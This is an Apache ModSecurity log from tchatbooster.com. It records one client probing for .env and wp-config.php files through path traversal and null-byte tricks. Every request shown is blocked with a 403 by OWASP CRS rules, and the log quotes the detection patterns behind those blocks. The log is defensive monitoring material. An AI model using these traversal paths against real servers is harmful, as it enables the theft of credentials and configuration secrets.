[Tue May 12 04:39:38.838928 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS6no6NvB9WXx5V-6e8QAAARI"]
[Tue May 12 04:39:38.839014 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS6no6NvB9WXx5V-6e8QAAARI"]
[Tue May 12 04:39:38.839180 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS6no6NvB9WXx5V-6e8QAAARI"]
[Tue May 12 04:39:38.949660 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:30174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6s1tk6y7yBJLpJop5AAAAJc"]
[Tue May 12 04:39:38.967300 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS6jue9Sp-pIv_Bb61cQAAAUQ"], referer: https://tchatbooster.com/app/.env
[Tue May 12 04:39:38.967539 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKS6jue9Sp-pIv_Bb61cQAAAUQ"], referer: https://tchatbooster.com/app/.env
[Tue May 12 04:39:39.011110 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6s1tk6y7yBJLpJop5QAAAII"], referer: https://tchatbooster.com/../../.env
[Tue May 12 04:39:39.037453 2026] [core:error] [pid 1820198:tid 1820223] [client 45.148.10.166:30174] AH10244: invalid URI path (/../.env)
[Tue May 12 04:39:39.300496 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6no6NvB9WXx5V-6e8QAAARI"]
[Tue May 12 04:39:39.318530 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS681tk6y7yBJLpJop5wAAAII"], referer: https://tchatbooster.com/css../../.env.local
[Tue May 12 04:39:39.318762 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS681tk6y7yBJLpJop5wAAAII"], referer: https://tchatbooster.com/css../../.env.local
[Tue May 12 04:39:39.465836 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6jue9Sp-pIv_Bb61cQAAAUQ"], referer: https://tchatbooster.com/app/.env
[Tue May 12 04:39:39.494840 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS63o6NvB9WXx5V-6e8gAAARI"]
[Tue May 12 04:39:39.495099 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS63o6NvB9WXx5V-6e8gAAARI"]
[Tue May 12 04:39:39.522871 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6zue9Sp-pIv_Bb61dAAAAUQ"], referer: https://tchatbooster.com/../.env
[Tue May 12 04:39:39.523092 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS6zue9Sp-pIv_Bb61dAAAAUQ"], referer: https://tchatbooster.com/../.env
[Tue May 12 04:39:39.805587 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS681tk6y7yBJLpJop5wAAAII"], referer: https://tchatbooster.com/css../../.env.local
[Tue May 12 04:39:39.892541 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS6zue9Sp-pIv_Bb61dQAAAU8"]
[Tue May 12 04:39:39.892626 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS6zue9Sp-pIv_Bb61dQAAAU8"]
[Tue May 12 04:39:39.892793 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS6zue9Sp-pIv_Bb61dQAAAU8"]
[Tue May 12 04:39:39.968658 2026] [security2:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS63o6NvB9WXx5V-6e8gAAARI"]
[Tue May 12 04:39:39.989830 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS681tk6y7yBJLpJop6QAAAII"], referer: https://tchatbooster.com/var/www/.env
[Tue May 12 04:39:39.990094 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/var/www/.env"] [unique_id "agKS681tk6y7yBJLpJop6QAAAII"], referer: https://tchatbooster.com/var/www/.env
[Tue May 12 04:39:40.024456 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6zue9Sp-pIv_Bb61dAAAAUQ"], referer: https://tchatbooster.com/../.env
[Tue May 12 04:39:40.054523 2026] [core:error] [pid 1730175:tid 1730195] [client 45.148.10.166:30182] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 04:39:40.348649 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS6zue9Sp-pIv_Bb61dQAAAU8"]
[Tue May 12 04:39:40.375753 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS7Due9Sp-pIv_Bb61dgAAAUQ"], referer: https://tchatbooster.com/css../../.env.production
[Tue May 12 04:39:40.375978 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS7Due9Sp-pIv_Bb61dgAAAUQ"], referer: https://tchatbooster.com/css../../.env.production
[Tue May 12 04:39:40.481772 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS681tk6y7yBJLpJop6QAAAII"], referer: https://tchatbooster.com/var/www/.env
[Tue May 12 04:39:40.506913 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS7Due9Sp-pIv_Bb61dwAAAU8"]
[Tue May 12 04:39:40.507131 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/var/www/html/.env"] [unique_id "agKS7Due9Sp-pIv_Bb61dwAAAU8"]
[Tue May 12 04:39:40.534386 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS7M1tk6y7yBJLpJop6wAAAII"], referer: https://tchatbooster.com/.%00/../../.env
[Tue May 12 04:39:40.534582 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS7M1tk6y7yBJLpJop6wAAAII"], referer: https://tchatbooster.com/.%00/../../.env
[Tue May 12 04:39:40.534760 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 9)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS7M1tk6y7yBJLpJop6wAAAII"], referer: https://tchatbooster.com/.%00/../../.env
[Tue May 12 04:39:40.873634 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7Due9Sp-pIv_Bb61dgAAAUQ"], referer: https://tchatbooster.com/css../../.env.production
[Tue May 12 04:39:40.976627 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:30186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS7Due9Sp-pIv_Bb61dwAAAU8"]
[Tue May 12 04:39:40.987434 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS7Ho6NvB9WXx5V-6e9QAAAQw"]
[Tue May 12 04:39:40.987517 2026] [security2:error] [pid 1730175:tid 1730189] [client 45.148.10.166:30196] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS7Ho6NvB9WXx5V-6e9QAAAQw"]
